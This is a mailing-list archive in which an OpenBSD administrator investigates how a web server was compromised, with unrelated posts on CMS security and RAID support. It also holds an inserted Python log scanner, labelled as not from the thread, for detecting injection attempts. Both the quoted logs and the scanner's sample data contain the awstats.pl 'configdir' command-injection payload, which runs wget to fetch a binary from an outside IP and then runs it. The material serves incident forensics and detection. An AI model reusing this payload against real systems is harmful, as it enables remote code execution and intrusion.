dkcsum: wd1 matched BIOS disk 81
root on wd0a
rootdev=0x0 rrootdev=0x300 rawdev=0x302
WARNING: / was not properly unmounted
apm0: disconnected

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/
Re: How did they get here?
On 4 Jan 2006, at 16:28, Joachim Schipper wrote:

>> The messages in the log file indicate that they used some command injection in a script to call wget and download the files into /tmp. I'm fairly sure it was via a bad script, and I'm trying to locate which script was used, so far with no success.
>
> There was a phpBB2 in one of the paths used. If you have phpBB enabled somewhere, that's a likely attack vector.

That was one of the locations that the linuxday worm was being downloaded from by the wget request.

On 4 Jan 2006, at 16:35, Bryan Irvine wrote:

> I'd suspect it has something more to do with an easy-to-guess password.

Even if the wget entries in the /var/www/logs/error_log correspond to the times and dates of the files in /tmp?

bash-3.00# ls -lFa /tmp
total 68
drwxrwxrwt   2 root  wheel    512 Jan  4 18:10 ./
drwxr-xr-x  22 root  wheel    512 Jun 29  2005 ../
-rw-r--r--   1 www   wheel   3355 Jan  2 04:14 .cpanel
-rw-r--r--   1 www   wheel  18695 Jan  2 04:15 .cpanel.tmp
-rw-r--r--   1 www   wheel      0 Jan  2 05:28 .plesk

Some other suspect entries are these:

61.139.83.132 - - [02/Jan/2006:07:18:12 +] GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1 404 300
61.139.83.132 - - [02/Jan/2006:07:18:13 +] GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1 404 300
61.139.83.132 - - [02/Jan/2006:07:18:15 +] GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1 404 308

Even though we don't have awstats installed anywhere (hence the 404). There are many 404 errors for this script.

bash-3.00# locate awstats.pl
bash-3.00#

It's just a bit frustrating.

Am I right in thinking if the wget output is in /var/www/logs/error_log then it comes from a site that has no defined ErrorLog. This is a limited number of sites, but I've found no log entries from the transfer logs for those sites that correspond with the times that wget was run.

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/
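An added example, not from the thread: decoding the awstats probes quoted in the post above. The `configdir=|...|` form is the well-known awstats.pl command injection, where the parameter is interpolated into a shell command line and the pipe characters run whatever follows; the `echo YYY` pairs are markers the attacker's tool uses to cut its own output out of the page. This Python routine parses common-log-format lines, URL-decodes every query parameter, flags values carrying unquoted shell metacharacters, splits the chain into individual commands, pulls out the host the payload is fetched from, and records whether the request got a 2xx (the probe hit a real script) or, as in the post, a 404. The sample lines are constructed to match the ones in the post (same source IP, path and payload; the time zone digits and the benign last line are made up).

```python
import re
from urllib.parse import unquote

# Constructed sample in Apache common log format, modelled on the awstats lines
# quoted in the post; the final line is ordinary traffic for contrast.
SAMPLE_ACCESS_LOG = """\
61.139.83.132 - - [02/Jan/2006:07:18:12 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 300
61.139.83.132 - - [02/Jan/2006:07:18:13 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 300
61.139.83.132 - - [02/Jan/2006:07:18:15 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 308
192.0.2.7 - - [02/Jan/2006:07:20:01 +0000] "GET /index.php?page=news&id=12 HTTP/1.1" 200 5123
"""

# Common log format; the quotes around the request are optional because mail
# archives often strip them, as in the lines quoted in the post.
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]*)\] "?(?P<method>[A-Z]+) (?P<uri>\S+) '
    r'(?P<proto>HTTP/[\d.]+)"? (?P<status>\d{3}) (?P<size>\d+|-)'
)
# Unquoted shell metacharacters that have no business in a CGI parameter value.
SHELL_META = re.compile(r'[|;`]|\$\(')
# Commands that fetch a payload; the first host-looking token after them is the source.
FETCH_TOOLS = {'wget', 'curl', 'fetch', 'ftp', 'lynx'}
URLISH = re.compile(r'(?:[a-z]+://)?((?:\d{1,3}\.){3}\d{1,3}|[\w-]+(?:\.[\w-]+)+)(?::\d+)?(?:/\S*)?')


def _query_params(uri):
    """Split '/path?a=1&b=2' into (path, [(name, decoded value), ...]).
    Splitting on '&' by hand avoids urllib.parse.parse_qsl, which on older
    Pythons also splits on ';' and would chop the injected chain in half."""
    path, _, query = uri.partition('?')
    params = []
    for pair in query.split('&'):
        if pair:
            name, _, value = pair.partition('=')
            params.append((unquote(name), unquote(value)))
    return path, params


def _payload_hosts(commands):
    """Hosts named in fetch commands, e.g. 'wget 209.136.48.69/mirela' -> 209.136.48.69."""
    hosts = set()
    for cmd in commands:
        words = cmd.split()
        if words and words[0].rsplit('/', 1)[-1] in FETCH_TOOLS:
            m = URLISH.search(cmd)
            if m:
                hosts.add(m.group(1))
    return sorted(hosts)


def scan_access_log(text):
    """One finding per (request, parameter) whose decoded value looks like a shell chain."""
    findings = []
    for line in text.splitlines():
        m = CLF.match(line)
        if not m:
            continue
        path, params = _query_params(m.group('uri'))
        status = int(m.group('status'))
        for name, value in params:
            if not SHELL_META.search(value):
                continue
            commands = [c for c in re.split(r'\s*[|;]\s*', value) if c]
            findings.append({
                'ip': m.group('ip'),
                'time': m.group('ts'),
                'path': path,
                'param': name,
                'commands': commands,
                'payload_hosts': _payload_hosts(commands),
                'status': status,
                # 2xx means a real script answered and the chain may have run;
                # a 404 (as here) means the probe missed but still shows intent.
                'landed': 200 <= status < 300,
            })
    return findings


if __name__ == '__main__':
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{f['ip']} {f['time']} {f['path']} [{f['param']}] "
              f"status={f['status']} landed={f['landed']} hosts={f['payload_hosts']}")
        for c in f['commands']:
            print('    ', c)
```

The `landed` flag is the triage key: with every hit a 404 these are background scanning and the box was not touched through awstats, whereas a 2xx for the same chain against a script that does exist is the request to line up against the wget transcript in error_log and the timestamps on the files in /tmp.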
Re: How did they get here?
On 4 Jan 2006, at 16:10, knitti wrote:

> I would think php, but this doesn't explain it unless you turned the chroot off.

Due to historical reasons, we're not running apache chrooted. This is why they're in /tmp rather than /var/www/tmp, or any other place.

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/
Re: How did they get here?
On 4 Feb 2006, at 20:38, veins wrote:

>>> I would think php, but this doesn't explain it unless you turned the chroot off.
>>
>> Due to historical reasons, we're not running apache chrooted. This is why they're in /tmp rather than /var/www/tmp, or any other place.
>
> historical ?

There are sites on this machine that we've had since 2000, and that were running on various insecure OSes before we made the move to OpenBSD. I suspect that it would be a medium/large sized task to make these sites work under chroot, as well as reorganise the user home folders to fit in with this. On the other hand, getting my server pwn3d (again) is even more of a ballache. Time to book in some configuration time...

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/
Re: Mambo Server hacks
On 26 Nov 2005, at 11:18, Edd Barrett wrote:

> Is there a better, more secure replacement as a CMS?

Tried postnuke or phpnuke or one of the other hundreds of variants based around the word nuke? I've heard that they're not great in terms of security either.

Have you considered Ruby on Rails? It's a bit more low level but a lot more fun.

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/
bioctl Device Support
Hi,

I've just upgraded to 3.8, hoping that ami/bioctl would support my RAID card, which it doesn't:

ami0 at pci1 dev 14 function 1 Intel 80960RP ATU rev 0x02: irq 14 Dell 467/32b
ami0: FW 1.06, BIOS v1p00, 128MB RAM
ami0: 2 channels, 16 targets, 1 logical drives
scsibus0 at ami0: 1 targets
sd0 at scsibus0 targ 0 lun 0: AMI, Host drive #00, SCSI2 0/direct fixed
sd0: 17136MB, 2184 cyl, 255 head, 63 sec, 512 bytes/sec, 35094528 sec total
scsibus1 at ami0: 16 targets
safte0 at scsibus1 targ 6 lun 0: DELL, 1x6 SCSI BP, 5.47 SCSI2 3/processor fixed
scsibus2 at ami0: 16 targets

If I can ask, which models of RAID card are being worked on for the 3.9 release?

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/